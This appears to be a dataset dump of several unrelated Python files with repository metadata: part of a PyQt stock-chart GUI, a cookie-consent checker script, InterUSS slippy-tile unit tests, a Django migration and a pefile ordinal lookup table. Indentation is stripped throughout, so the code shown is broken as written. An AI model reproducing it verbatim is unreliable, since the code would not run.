enddate = enddate.strftime("%Y/%m/%d")
option = self.ui.comboBox.currentText()
option = str(option)
#if (self.ui.treewidget) == 0:
#self.ui.label.setText("Need to select at least one query")
#return
root = self.ui.treeWidget_2.invisibleRootItem()# This is for iterating child items
child_count = root.childCount()
if child_count==0:
return
for i in range(child_count):
if root.child(i).child(0):
array = []
temp = root.child(i)
#mergelist = self.recurse(temp,array)
#print(mergelist)
parent = root.child(i).text(0)
mergelist = []
for j in range(temp.childCount()):
while temp.child(j).childCount()!=0:
#self.ui.label.setText("Error: Invalid Tree!")
return
txt = temp.child(j).text(0)
mergelist.append(txt)
mergelist.insert(0,parent)
url = self.graphmerge(mergelist)
items.append(url)
else:
item = root.child(i)
url = item.text(0)
items.append(url)
labels = [k for k in items]
items = ([x.encode("utf-8") for x in labels])
width = self.ui.widget.width()#give width and height of user's screen so that graphs can be generated with dynamic size
height = self.ui.widget.height()
graphpage(labels, startdate,enddate,option,width, height)#labels:复权ork线or分笔 option:hfq, qfq or 15, 30, D, etc
self.ui.widget.reload()#refreshes webengine
self.ui.widget.repaint()
self.ui.widget.update()
def openMenu(self,position):
indexes = self.ui.treeWidget.selectedIndexes()
item = self.ui.treeWidget.itemAt(position)
db_origin = ""
#if item.parent():
# db_origin = item.parent().text(0)
collec = str(item.text(0).encode("utf-8"))
if len(indexes) > 0:
level = 0
index = indexes[0]
while index.parent().isValid():
index = index.parent()
level = level + 1
menu = QMenu()
#print((collec, db_origin))
if level ==0:
pass
else:
#keyarray = GetKeys(collec, db_origin)
#if "Open" in keyarray:
if self.ui.combobox.currentText()==u"K线":
menu.addAction(QAction("Kline", menu, checkable=True))
menu.addAction(QAction("Open", menu, checkable=True))
menu.addAction(QAction("Close", menu, checkable=True))#open up different menu with different kind of graphs
menu.addAction(QAction("High", menu, checkable=True))
menu.addAction(QAction("Low", menu, checkable=True))
menu.addAction(QAction("Volume", menu, checkable=True))
#menu.addAction(QAction("P_change", menu, checkable=True))
#menu.addAction(QAction("Turnover",menu,checkable=True))
if self.ui.combobox.currentText()==u"复权":
menu.addAction(QAction("Kline", menu, checkable=True))
menu.addAction(QAction("Open", menu, checkable=True))
menu.addAction(QAction("Close", menu, checkable=True))
menu.addAction(QAction("High", menu, checkable=True))
menu.addAction(QAction("Low", menu, checkable=True))
menu.addAction(QAction("Volume", menu, checkable=True))
menu.addAction(QAction("Amount", menu, checkable=True))
if self.ui.combobox.currentText()==u"分笔数据":
menu.addAction(QAction("分笔", menu, checkable=True))
if self.ui.combobox.currentText()==u"历史分钟":
menu.addAction(QAction("Kline", menu, checkable=True))
menu.addAction(QAction("Open", menu, checkable=True))
menu.addAction(QAction("Close", menu, checkable=True))
menu.addAction(QAction("High", menu, checkable=True))
menu.addAction(QAction("Low", menu, checkable=True))
menu.addAction(QAction("Volume", menu, checkable=True))
menu.addAction(QAction("Amount", menu, checkable=True))
if self.ui.combobox.currentText()==u"十大股东":
menu.addAction(QAction("季度饼图", menu, checkable=True))
#menu.addAction(QAction("持股比例", menu, checkable=True))
#for g in keyarray:
#menu.addAction(QAction(g, menu, checkable=True))
menu.triggered.connect(lambda action: self.methodSelected(action, collec))
menu.exec_(self.ui.treeWidget.viewport().mapToGlobal(position))
app = QApplication(sys.argv)
w = MyUi()
w.show()
sys.exit(app.exec_())
| 45.142442
| 127
| 0.586902
|
573e2b8dce3e4e86b7731c5aa1c96bd6798148fa
| 306
|
py
|
Python
|
test.py
|
Dr3xler/CookieConsentChecker
|
816cdfb9d9dc741c57dbcd5e9c9ef59837196631
|
[
"MIT"
] | null | null | null |
test.py
|
Dr3xler/CookieConsentChecker
|
816cdfb9d9dc741c57dbcd5e9c9ef59837196631
|
[
"MIT"
] | 3
|
2021-04-29T22:57:09.000Z
|
2021-05-03T15:32:39.000Z
|
test.py
|
Dr3xler/CookieConsentChecker
|
816cdfb9d9dc741c57dbcd5e9c9ef59837196631
|
[
"MIT"
] | 1
|
2021-08-29T09:53:09.000Z
|
2021-08-29T09:53:09.000Z
|
from core import file_handling as file_h, driver_handling as driver_h
from website_handling import collect_websites as collect
websites = file_h.website_reader_cookie_websites()
driver = driver_h.webdriver_setup()
#idcac_poc.addon_check(driver, websites)
collect.generate_success_list(driver, websites)
| 30.6
| 69
| 0.849673
|
fa69bd7d7c68df58c1e6190ea72750add1635a1f
| 8,184
|
py
|
Python
|
datanode/src/slippy_util_test.py
|
airmap/InterUSS-Platform
|
fa19af360826b4dd7b841013c0c569a4f282919d
|
[
"Apache-2.0"
] | null | null | null |
datanode/src/slippy_util_test.py
|
airmap/InterUSS-Platform
|
fa19af360826b4dd7b841013c0c569a4f282919d
|
[
"Apache-2.0"
] | 1
|
2021-03-26T12:13:17.000Z
|
2021-03-26T12:13:17.000Z
|
datanode/src/slippy_util_test.py
|
isabella232/InterUSS-Platform
|
fa19af360826b4dd7b841013c0c569a4f282919d
|
[
"Apache-2.0"
] | 2
|
2019-08-11T20:20:32.000Z
|
2021-03-26T12:01:43.000Z
|
"""Test of the InterUSS Platform Data Node slippy utilities.
Copyright 2018 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import slippy_util
class InterUSSSlippyUtilitiesTestCase(unittest.TestCase):
def testValidateSlippy(self):
pass
def testValidateSlippy(self):
pass
def testValidCSVConversions(self):
self.assertEqual([(0.0, 0.0)], slippy_util.convert_csv_to_coordinates('0,0'))
self.assertEqual([(40.0, 0.0)], slippy_util.convert_csv_to_coordinates('40,0'))
self.assertEqual([(40.4, 0.0)],
slippy_util.convert_csv_to_coordinates('40.4,0'))
self.assertEqual([(40.4, 110.0)],
slippy_util.convert_csv_to_coordinates('40.4,110'))
self.assertEqual([(40.4, 110.1)],
slippy_util.convert_csv_to_coordinates('40.4,110.1'))
def testInvalidCSVConversions(self):
with self.assertRaises(TypeError):
slippy_util.convert_csv_to_coordinates(None)
with self.assertRaises(TypeError):
slippy_util.convert_csv_to_coordinates(0)
with self.assertRaises(TypeError):
slippy_util.convert_csv_to_coordinates('')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('1')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('10 100')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('COORDS')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('10,C')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('91,10')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('10,191')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('10,11,12')
def testConversionOfTilesToPolygons(self):
pass
def testValidPointConversions(self):
self.assertEqual((0, 0), slippy_util.convert_point_to_tile(0, 0, 0))
self.assertEqual((1, 1), slippy_util.convert_point_to_tile(1, 0, 0))
self.assertEqual((2, 2), slippy_util.convert_point_to_tile(2, 0, 0))
self.assertEqual((3, 1), slippy_util.convert_point_to_tile(2, 34, 110))
self.assertEqual((412, 204), slippy_util.convert_point_to_tile(9, 34, 110))
self.assertEqual((412, 307), slippy_util.convert_point_to_tile(9, -34, 110))
self.assertEqual((99, 307), slippy_util.convert_point_to_tile(9, -34, -110))
self.assertEqual((99, 204), slippy_util.convert_point_to_tile(9, 34, -110))
def testInvalidPointConversions(self):
with self.assertRaises(ValueError):
slippy_util.convert_point_to_tile(-1, 0, 0)
with self.assertRaises(ValueError):
slippy_util.convert_point_to_tile(21, 0, 0)
with self.assertRaises(ValueError):
slippy_util.convert_point_to_tile(1, 91, 10)
with self.assertRaises(ValueError):
slippy_util.convert_point_to_tile(1, 10, 191)
with self.assertRaises(TypeError):
slippy_util.convert_point_to_tile(1, 10, None)
with self.assertRaises(ValueError):
slippy_util.convert_path_to_tiles(0, [(0, 0)])
with self.assertRaises(OverflowError):
slippy_util.convert_path_to_tiles(15, [(0, 0), (1, 1.5)])
def testValidPathConversions(self):
self.assertEqual(1,
len(slippy_util.convert_path_to_tiles(0, [(0, 0), (1, 1.5)])))
self.assertEqual(2,
len(slippy_util.convert_path_to_tiles(5, [(0, 0), (1, 1.5)])))
# One segment should be the same as two segments that overlapp
self.assertEqual(len(slippy_util.convert_path_to_tiles(10, [(0, 0), (1, 1.5)])),
len(slippy_util.convert_path_to_tiles(10, [(0, 0), (1, 1.5),
(0, 0)])))
# 4 points are in 4 separate grids,
# and there are 2 grids underlapping the path
self.assertEqual(6, len(
slippy_util.convert_path_to_tiles(9, [(47.5, -103), (47.5, -102.5),
(48, -102.5), (48, -103),
(47.5, -103)])))
# Corner cutter case that two points are in two grids, but they cut
# a corner and that grid should be included
self.assertEqual(3, len(
slippy_util.convert_path_to_tiles(
9, [(37.936541030367316, -122.377713074509),
(37.69672993401783, -122.10422390269278)])))
def testInvalidPathConversions(self):
with self.assertRaises(TypeError):
slippy_util.convert_path_to_tiles(0, None)
with self.assertRaises(TypeError):
slippy_util.convert_path_to_tiles(0, 0)
with self.assertRaises(TypeError):
slippy_util.convert_path_to_tiles(0, '0,0,1,1.5')
with self.assertRaises(ValueError):
slippy_util.convert_path_to_tiles(0, [])
with self.assertRaises(TypeError):
slippy_util.convert_path_to_tiles(0, [(0), (1)])
# test a lot of tiles calculation
with self.assertRaises(OverflowError):
slippy_util.convert_polygon_to_tiles(15, [(47.5, -103), (47.5, -101.8),
(48, -101.8), (48, -103),
(47.5, -103)])
def testValidPolygonConversions(self):
self.assertEqual(1, len(
slippy_util.convert_polygon_to_tiles(0, [(0, 0), (1, 1.5), (2, 0), (0, 0)])))
self.assertEqual(2, len(
slippy_util.convert_polygon_to_tiles(5, [(0, 0), (1, 1.5), (2, 0), (0, 0)])))
# check auto closing
self.assertEqual(
slippy_util.convert_polygon_to_tiles(9, [(0, 0), (1, 1.5), (2, 0)]),
slippy_util.convert_polygon_to_tiles(9, [(0, 0), (1, 1.5), (2, 0), (0, 0)]))
# 4 points are in 4 separate grids,
# and there are 4 grids underlapping the path, and 1 grid surrounded
self.assertEqual(9, len(
slippy_util.convert_polygon_to_tiles(9, [(47.5, -103), (47.5, -101.8),
(48, -101.8), (48, -103),
(47.5, -103)])))
def testInvalidPolygonConversions(self):
with self.assertRaises(TypeError):
slippy_util.convert_polygon_to_tiles(0, None)
with self.assertRaises(TypeError):
slippy_util.convert_polygon_to_tiles(0, 0)
with self.assertRaises(TypeError):
slippy_util.convert_polygon_to_tiles(0, '0,0,1,1.5')
with self.assertRaises(ValueError):
slippy_util.convert_polygon_to_tiles(0, [])
with self.assertRaises(ValueError):
slippy_util.convert_polygon_to_tiles(0, [(0), (1)])
def testSlippyConversionsForSpecialCases(self):
# 4x4 grid used for these tests at zoom 4
# 8,8 9,8 10,8 11,8
# 8,9 9,9 10,9 11,9
# 8,10 9,10 10,10 11,10
# 8,11 9,11 10,11 11,11
# points of interest
point_8x8 = (-19.808, 20.039)
point_8x11 = (-65.730, 19.160)
point_11x11 = (-58.263, 71.367)
point_11x8 = (-6.839, 82.441)
# all 16 for all four by polygon
self.assertEqual(16, len(
slippy_util.convert_polygon_to_tiles(
4, [point_8x8, point_8x11, point_11x11, point_11x8])))
# only 10 by path (no closing the path)
self.assertEqual(10, len(
slippy_util.convert_path_to_tiles(
4, [point_8x8, point_8x11, point_11x11, point_11x8])))
# corner to corner should be 7
self.assertEqual(7, len(
slippy_util.convert_path_to_tiles(
4, [point_8x8, point_11x11])))
self.assertEqual(7, len(
slippy_util.convert_path_to_tiles(
4, [point_8x11, point_11x8])))
# triangle to the bottom is 11
self.assertEqual(11, len(
slippy_util.convert_polygon_to_tiles(
4, [point_11x8, point_8x11, point_11x11, point_11x8])))
| 43.301587
| 84
| 0.661901
|
12663adde6dee25c0714369e6ef31c046edf352b
| 570
|
py
|
Python
|
django_app/visitas_granada/migrations/0007_auto_20200619_1039.py
|
AngelValera/SSBW
|
7bcd1380b2406de7a4850a7e00b1428f2fb5c099
|
[
"MIT"
] | null | null | null |
django_app/visitas_granada/migrations/0007_auto_20200619_1039.py
|
AngelValera/SSBW
|
7bcd1380b2406de7a4850a7e00b1428f2fb5c099
|
[
"MIT"
] | 5
|
2020-06-18T16:30:42.000Z
|
2022-01-13T02:54:01.000Z
|
django_app/visitas_granada/migrations/0007_auto_20200619_1039.py
|
AngelValera/SSBW
|
7bcd1380b2406de7a4850a7e00b1428f2fb5c099
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.7 on 2020-06-19 08:39
import django.core.validators
from django.db import migrations
import sorl.thumbnail.fields
class Migration(migrations.Migration):
dependencies = [
('visitas_granada', '0006_auto_20200619_1036'),
]
operations = [
migrations.AlterField(
model_name='visita',
name='foto',
field=sorl.thumbnail.fields.ImageField(blank=True, upload_to='fotos', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['jpg', 'png'])]),
),
]
| 27.142857
| 177
| 0.67193
|
c9b12faec58d2939adc18b008f7e310703d46457
| 111,264
|
py
|
Python
|
s/sv221mn.py
|
byeongal/pefile_ordlookup
|
9400d24890601e4ec47f3b279b72f4fd9ca1d58d
|
[
"MIT"
] | null | null | null |
s/sv221mn.py
|
byeongal/pefile_ordlookup
|
9400d24890601e4ec47f3b279b72f4fd9ca1d58d
|
[
"MIT"
] | null | null | null |
s/sv221mn.py
|
byeongal/pefile_ordlookup
|
9400d24890601e4ec47f3b279b72f4fd9ca1d58d
|
[
"MIT"
] | null | null | null |
# md5 : e4d92ee9e51d571e98231351d2b9aa6d
# sha1 : f28d4e3190863734ac8a6759692cf3b5c9e210a8
# sha256 : a6939c20ced2c6ac4f4b0eb4294044094ab00c6303133c696ccdfb43d4bc3c16
ord_names = {
20: b'??0Link@@QAE@ABV0@@Z',
21: b'??0Link@@QAE@XZ',
22: b'??0Stack@@QAE@GG@Z',
23: b'??1Stack@@QAE@XZ',
24: b'??4Link@@QAEAAV0@ABV0@@Z',
25: b'?Call@Link@@QAEJPAX@Z',
26: b'?Count@Container@@QBEKXZ',
27: b'?Count@Stack@@QBEKXZ',
28: b'?GetObject@Stack@@QBEPAXK@Z',
29: b'?Pop@Stack@@QAEPAXXZ',
30: b'?Push@Stack@@QAEXPAX@Z',
31: b'?First@List@@QAEPAXXZ',
32: b'?Next@List@@QAEPAXXZ',
33: b'??0Date@@QAE@ABVResId@@@Z',
34: b'??0International@@QAE@ABVResId@@@Z',
35: b'??0ResMgr@@QAE@PAD@Z',
36: b'??0Resource@@QAE@ABVResId@@@Z',
37: b'??0String@@QAE@ABVResId@@@Z',
38: b'??0Time@@QAE@ABVResId@@@Z',
39: b'??1ResMgr@@QAE@XZ',
40: b'?Clear@STACK_TYPE@@QAEXPBVResource@@G@Z',
41: b'?GetClass@ResMgr@@QAEPAXXZ',
42: b'?GetId@ResId@@QBEGXZ',
43: b'?GetRT@ResId@@QBEFXZ',
44: b'?GetRemainSize@ResMgr@@QAEGXZ',
45: b'?GetRes@Resource@@QAEXABVResId@@@Z',
46: b'?GetResManager@Resource@@SGPAVResMgr@@XZ',
47: b'?GetResource@ResMgr@@QAEEFGPAURSHEADER_TYPE@@PBVResource@@@Z',
48: b'?GetStringSize@ResMgr@@SGGG@Z',
49: b'?GetStringSize@ResMgr@@SGGPAD@Z',
50: b'?GetpResource@ResId@@QBEPAURSHEADER_TYPE@@XZ',
51: b'?Increment@ResMgr@@QAEPAXG@Z',
52: b'?IncrementRes@Resource@@SGPAXG@Z',
53: b'?IsAvailable@ResMgr@@QBEEFGPAURSHEADER_TYPE@@PBVResource@@@Z',
54: b'?PopContext@ResMgr@@QAEXPBVResource@@@Z',
55: b'?SetRT@ResId@@QBEABV1@F@Z',
56: b'?SetResManager@Resource@@SGXPAVResMgr@@@Z',
57: b'?TestRes@Resource@@QAEXXZ',
58: b'?TestStack@ResMgr@@QAEXPBVResource@@@Z',
59: b'??0Color@@QAE@ABVResId@@@Z',
60: b'??8Color@@QBEEABV0@@Z',
61: b'??9Color@@QBEEABV0@@Z',
62: b'?ChangeBlue@Color@@QAEGG@Z',
63: b'?ChangeColorName@Color@@QAE?AW4ColorName@@W42@@Z',
64: b'?ChangeGreen@Color@@QAEGG@Z',
65: b'?ChangeRed@Color@@QAEGG@Z',
66: b'?GetBlue@Color@@QBEGXZ',
67: b'?GetClassRes@Resource@@SGPAXXZ',
68: b'?GetColBlue@@YGGW4ColorName@@@Z',
69: b'?GetColGreen@@YGGW4ColorName@@@Z',
70: b'?GetColRed@@YGGW4ColorName@@@Z',
71: b'?GetGreen@Color@@QBEGXZ',
72: b'?GetRed@Color@@QBEGXZ',
73: b'??0Brush@@QAE@ABV0@@Z',
74: b'??0Brush@@QAE@ABVBitmap@@@Z',
75: b'??0Brush@@QAE@ABVColor@@0W4BrushStyle@@@Z',
76: b'??0Brush@@QAE@ABVColor@@W4BrushStyle@@@Z',
77: b'??0Brush@@QAE@ABVResId@@@Z',
78: b'??0Brush@@QAE@W4BrushStyle@@@Z',
79: b'??0Brush@@QAE@XZ',
80: b'??0Color@@QAE@W4ColorName@@@Z',
81: b'??0Font@@QAE@ABV0@@Z',
82: b'??0Font@@QAE@ABVResId@@@Z',
83: b'??0Font@@QAE@ABVString@@ABVSize@@@Z',
84: b'??0Font@@QAE@W4FontFamily@@ABVSize@@@Z',
85: b'??0Font@@QAE@XZ',
86: b'??0Pair@@QAE@ABV0@@Z',
87: b'??0Pair@@QAE@FF@Z',
88: b'??0Pair@@QAE@XZ',
89: b'??0Pen@@QAE@ABV0@@Z',
90: b'??0Pen@@QAE@ABVColor@@GW4PenStyle@@@Z',
91: b'??0Pen@@QAE@ABVResId@@@Z',
92: b'??0Pen@@QAE@W4PenStyle@@@Z',
93: b'??0Pen@@QAE@XZ',
94: b'??0ResId@@QAE@PAURSHEADER_TYPE@@@Z',
95: b'??0Resource@@QAE@XZ',
96: b'??0Size@@QAE@ABV0@@Z',
97: b'??0Size@@QAE@FF@Z',
98: b'??0Size@@QAE@XZ',
99: b'??1Brush@@QAE@XZ',
100: b'??1Color@@QAE@XZ',
101: b'??1Font@@QAE@XZ',
102: b'??1Pen@@QAE@XZ',
103: b'??1Resource@@QAE@XZ',
104: b'??4Brush@@QAEAAV0@ABV0@@Z',
105: b'??4Font@@QAEAAV0@ABV0@@Z',
106: b'??4Pair@@QAEAAV0@ABV0@@Z',
107: b'??4Pen@@QAEAAV0@ABV0@@Z',
108: b'??4Size@@QAEAAV0@ABV0@@Z',
109: b'??8Brush@@QBEEABV0@@Z',
110: b'??8Font@@QBEEABV0@@Z',
111: b'??8Pair@@QBEEABV0@@Z',
112: b'??8Pen@@QBEEABV0@@Z',
113: b'??9Brush@@QBEEABV0@@Z',
114: b'??9Font@@QBEEABV0@@Z',
115: b'??9Pen@@QBEEABV0@@Z',
116: b'?ChangeAlign@Font@@QAE?AW4FontAlign@@W42@@Z',
117: b'?ChangeBitmap@Brush@@QAE?AVBitmap@@ABV2@@Z',
118: b'?ChangeCharOrientation@Font@@QAEFF@Z',
119: b'?ChangeCharSet@Font@@QAE?AW4CharSet@@W42@@Z',
120: b'?ChangeColor@Brush@@QAE?AVColor@@ABV2@@Z',
121: b'?ChangeColor@Font@@QAE?AVColor@@ABV2@@Z',
122: b'?ChangeColor@Pen@@QAE?AVColor@@ABV2@@Z',
123: b'?ChangeFamily@Font@@QAE?AW4FontFamily@@W42@@Z',
124: b'?ChangeFillColor@Brush@@QAE?AVColor@@ABV2@@Z',
125: b'?ChangeFillColor@Font@@QAE?AVColor@@ABV2@@Z',
126: b'?ChangeItalic@Font@@QAEEE@Z',
127: b'?ChangeLineOrientation@Font@@QAEFF@Z',
128: b'?ChangeName@Font@@QAE?AVString@@ABV2@@Z',
129: b'?ChangeOutline@Font@@QAEEE@Z',
130: b'?ChangePitch@Font@@QAE?AW4FontPitch@@W42@@Z',
131: b'?ChangeShadow@Font@@QAEEE@Z',
132: b'?ChangeSize@Font@@QAE?AVSize@@ABV2@@Z',
133: b'?ChangeStrikeout@Font@@QAE?AW4FontStrikeout@@W42@@Z',
134: b'?ChangeStyle@Brush@@QAE?AW4BrushStyle@@W42@@Z',
135: b'?ChangeStyle@Pen@@QAE?AW4PenStyle@@W42@@Z',
136: b'?ChangeTransparent@Brush@@QAEEE@Z',
137: b'?ChangeTransparent@Font@@QAEEE@Z',
138: b'?ChangeUnderline@Font@@QAE?AW4FontUnderline@@W42@@Z',
139: b'?ChangeWeight@Font@@QAE?AW4FontWeight@@W42@@Z',
140: b'?ChangeWidth@Pen@@QAEGG@Z',
141: b'?GetBitmap@Brush@@QBEABVBitmap@@XZ',
142: b'?GetObjSize@ResMgr@@SGGPAURSHEADER_TYPE@@@Z',
143: b'?GetObjSizeRes@Resource@@SGGPAURSHEADER_TYPE@@@Z',
144: b'?GetStringSizeRes@Resource@@SGGPAD@Z',
145: b'?IsHatched@Brush@@QBEEXZ',
146: b'?IsTransparent@Brush@@QBEEXZ',
147: b'??0FontMetric@@QAE@ABV0@@Z',
148: b'??0FontMetric@@QAE@XZ',
149: b'??1FontMetric@@QAE@XZ',
150: b'??4FontMetric@@QAEAAV0@ABV0@@Z',
151: b'??8FontMetric@@QBEEABV0@@Z',
152: b'??9FontMetric@@QBEEABV0@@Z',
153: b'?ExistChar@FontMetric@@QBEED@Z',
154: b'??0GDIMetaFile@@QAE@ABV0@@Z',
155: b'??0GDIMetaFile@@QAE@XZ',
156: b'??0Point@@QAE@XZ',
157: b'??1GDIMetaFile@@UAE@XZ',
158: b'??4GDIMetaFile@@QAEAAV0@ABV0@@Z',
159: b'??_7GDIMetaFile@@6B@',
160: b'??_GGDIMetaFile@@UAEPAXI@Z',
161: b'?AddGDIAction@GDIMetaFile@@QAEXPAVMetaAction@@@Z',
162: b'?ChangePrefMapMode@GDIMetaFile@@QAE?AVMapMode@@ABV2@@Z',
163: b'?ChangePrefPalette@GDIMetaFile@@QAE?AVPalette@@ABV2@@Z',
164: b'?ChangePrefSize@GDIMetaFile@@QAE?AVSize@@ABV2@@Z',
165: b'?Clear@GDIMetaFile@@QAEXXZ',
166: b'?Duplicate@MetaAction@@QAEXXZ',
167: b'?GetBackgroundBrush@OutputDevice@@QBEABVBrush@@XZ',
168: b'?GetFillInBrush@OutputDevice@@QBEABVBrush@@XZ',
169: b'?GetFont@OutputDevice@@QBEABVFont@@XZ',
170: b'?GetMapMode@OutputDevice@@QBEABVMapMode@@XZ',
171: b'?GetOutDevType@OutputDevice@@QBE?AW4OutDevType@@XZ',
172: b'?GetPen@OutputDevice@@QBEABVPen@@XZ',
173: b'?GetPrefMapMode@GDIMetaFile@@QBEABVMapMode@@XZ',
174: b'?GetPrefSize@GDIMetaFile@@QBEABVSize@@XZ',
175: b'?GetRasterOp@OutputDevice@@QBE?AW4RasterOp@@XZ',
176: b'?GetScaleX@MapMode@@QBEABVFraction@@XZ',
177: b'?GetScaleY@MapMode@@QBEABVFraction@@XZ',
178: b'?Height@Size@@QAEAAFXZ',
179: b'?IsClipRegion@OutputDevice@@QBEEXZ',
180: b'?IsRecord@MetaFile@@QBEEXZ',
181: b'?Linker@GDIMetaFile@@UAEXPAXE@Z',
182: b'?Play@GDIMetaFile@@QAEXPAVOutputDevice@@ABVPoint@@ABVSize@@K@Z',
183: b'?Play@GDIMetaFile@@QAEXPAVOutputDevice@@K@Z',
184: b'?SaveStatus@GDIMetaFile@@QAEEXZ',
185: b'?Width@Size@@QAEAAFXZ',
186: b'?X@Point@@QAEAAFXZ',
187: b'?Y@Point@@QAEAAFXZ',
188: b'??0Color@@QAE@XZ',
189: b'??0GDIArcAct@@QAE@ABVRectangle@@ABVPoint@@1@Z',
190: b'??0GDIArcAct@@QAE@XZ',
191: b'??0GDIBkBrushAct@@QAE@ABVBrush@@@Z',
192: b'??0GDIBkBrushAct@@QAE@XZ',
193: b'??0GDIBmpAct@@QAE@ABVPoint@@ABVBitmap@@@Z',
194: b'??0GDIBmpAct@@QAE@XZ',
195: b'??0GDIBmpScalAct@@QAE@ABVPoint@@ABVSize@@ABVBitmap@@@Z',
196: b'??0GDIBmpScalAct@@QAE@XZ',
197: b'??0GDIClipAct@@QAE@ABVRegion@@@Z',
198: b'??0GDIClipAct@@QAE@XZ',
199: b'??0GDIElipAct@@QAE@ABVRectangle@@@Z',
200: b'??0GDIElipAct@@QAE@XZ',
201: b'??0GDIFillBrushAct@@QAE@ABVBrush@@@Z',
202: b'??0GDIFillBrushAct@@QAE@XZ',
203: b'??0GDIFontAct@@QAE@ABVFont@@@Z',
204: b'??0GDIFontAct@@QAE@XZ',
205: b'??0GDIHighAct@@QAE@ABVRectangle@@@Z',
206: b'??0GDIHighAct@@QAE@XZ',
207: b'??0GDIIconAct@@QAE@ABVPoint@@ABVIcon@@@Z',
208: b'??0GDIIconAct@@QAE@XZ',
209: b'??0GDIInAct@@QAE@ABVRectangle@@@Z',
210: b'??0GDIInAct@@QAE@XZ',
211: b'??0GDIInClipAct@@QAE@ABVRectangle@@@Z',
212: b'??0GDIInClipAct@@QAE@XZ',
213: b'??0GDIKernTextAct@@QAE@ABVPoint@@ABVString@@GGPAF@Z',
214: b'??0GDIKernTextAct@@QAE@XZ',
215: b'??0GDILineAct@@QAE@ABVPoint@@0@Z',
216: b'??0GDILineAct@@QAE@XZ',
217: b'??0GDIMTFAction@@QAE@ABVGDIMetaFile@@@Z',
218: b'??0GDIMTFAction@@QAE@ABVGDIMetaFile@@ABVPoint@@ABVSize@@@Z',
219: b'??0GDIMTFAction@@QAE@XZ',
220: b'??0GDIMapAct@@QAE@ABVMapMode@@@Z',
221: b'??0GDIMapAct@@QAE@XZ',
222: b'??0GDIMoveClipAct@@QAE@FF@Z',
223: b'??0GDIMoveClipAct@@QAE@XZ',
224: b'??0GDIPenAct@@QAE@ABVPen@@@Z',
225: b'??0GDIPenAct@@QAE@XZ',
226: b'??0GDIPieAct@@QAE@ABVRectangle@@ABVPoint@@1@Z',
227: b'??0GDIPieAct@@QAE@XZ',
228: b'??0GDIPixAct@@QAE@ABVPoint@@ABVColor@@@Z',
229: b'??0GDIPixAct@@QAE@XZ',
230: b'??0GDIPolLinAct@@QAE@ABVPolygon@@@Z',
231: b'??0GDIPolLinAct@@QAE@XZ',
232: b'??0GDIPolyPolyAct@@QAE@ABVPolyPolygon@@@Z',
233: b'??0GDIPolyPolyAct@@QAE@XZ',
234: b'??0GDIPolygonAct@@QAE@ABVPolygon@@@Z',
235: b'??0GDIPolygonAct@@QAE@XZ',
236: b'??0GDIPopAct@@QAE@XZ',
237: b'??0GDIPtAct@@QAE@ABVPoint@@@Z',
238: b'??0GDIPtAct@@QAE@XZ',
239: b'??0GDIPushAct@@QAE@XZ',
240: b'??0GDIRasterAct@@QAE@W4RasterOp@@@Z',
241: b'??0GDIRasterAct@@QAE@XZ',
242: b'??0GDIRectAct@@QAE@ABVRectangle@@GG@Z',
243: b'??0GDIRectAct@@QAE@XZ',
244: b'??0GDISetOriginAction@@QAE@ABVPoint@@@Z',
245: b'??0GDISetOriginAction@@QAE@XZ',
246: b'??0GDIStrechAct@@QAE@ABVPoint@@GABVString@@GG@Z',
247: b'??0GDIStrechAct@@QAE@XZ',
248: b'??0GDITextAct@@QAE@ABVPoint@@ABVString@@GG@Z',
249: b'??0GDITextAct@@QAE@XZ',
250: b'??0KernTextActionDescr@@QAE@XZ',
251: b'??0Point@@QAE@ABV0@@Z',
252: b'??0Rectangle@@QAE@ABV0@@Z',
253: b'??0Rectangle@@QAE@XZ',
254: b'??1GDIArcAct@@UAE@XZ',
255: b'??1GDIBkBrushAct@@UAE@XZ',
256: b'??1GDIBmpAct@@UAE@XZ',
257: b'??1GDIBmpScalAct@@UAE@XZ',
258: b'??1GDIClipAct@@UAE@XZ',
259: b'??1GDIElipAct@@UAE@XZ',
260: b'??1GDIFillBrushAct@@UAE@XZ',
261: b'??1GDIFontAct@@UAE@XZ',
262: b'??1GDIHighAct@@UAE@XZ',
263: b'??1GDIIconAct@@UAE@XZ',
264: b'??1GDIInAct@@UAE@XZ',
265: b'??1GDIInClipAct@@UAE@XZ',
266: b'??1GDIKernTextAct@@UAE@XZ',
267: b'??1GDILineAct@@UAE@XZ',
268: b'??1GDIMTFAction@@UAE@XZ',
269: b'??1GDIMapAct@@UAE@XZ',
270: b'??1GDIMoveClipAct@@UAE@XZ',
271: b'??1GDIPenAct@@UAE@XZ',
272: b'??1GDIPieAct@@UAE@XZ',
273: b'??1GDIPixAct@@UAE@XZ',
274: b'??1GDIPolLinAct@@UAE@XZ',
275: b'??1GDIPolyPolyAct@@UAE@XZ',
276: b'??1GDIPolygonAct@@UAE@XZ',
277: b'??1GDIPopAct@@UAE@XZ',
278: b'??1GDIPtAct@@UAE@XZ',
279: b'??1GDIPushAct@@UAE@XZ',
280: b'??1GDIRasterAct@@UAE@XZ',
281: b'??1GDIRectAct@@UAE@XZ',
282: b'??1GDISetOriginAction@@UAE@XZ',
283: b'??1GDIStrechAct@@UAE@XZ',
284: b'??1GDITextAct@@UAE@XZ',
285: b'??1KernTextActionDescr@@QAE@XZ',
286: b'??4Point@@QAEAAV0@ABV0@@Z',
287: b'??_7GDIArcAct@@6B@',
288: b'??_7GDIBkBrushAct@@6B@',
289: b'??_7GDIBmpAct@@6B@',
290: b'??_7GDIBmpScalAct@@6B@',
291: b'??_7GDIClipAct@@6B@',
292: b'??_7GDIElipAct@@6B@',
293: b'??_7GDIFillBrushAct@@6B@',
294: b'??_7GDIFontAct@@6B@',
295: b'??_7GDIHighAct@@6B@',
296: b'??_7GDIIconAct@@6B@',
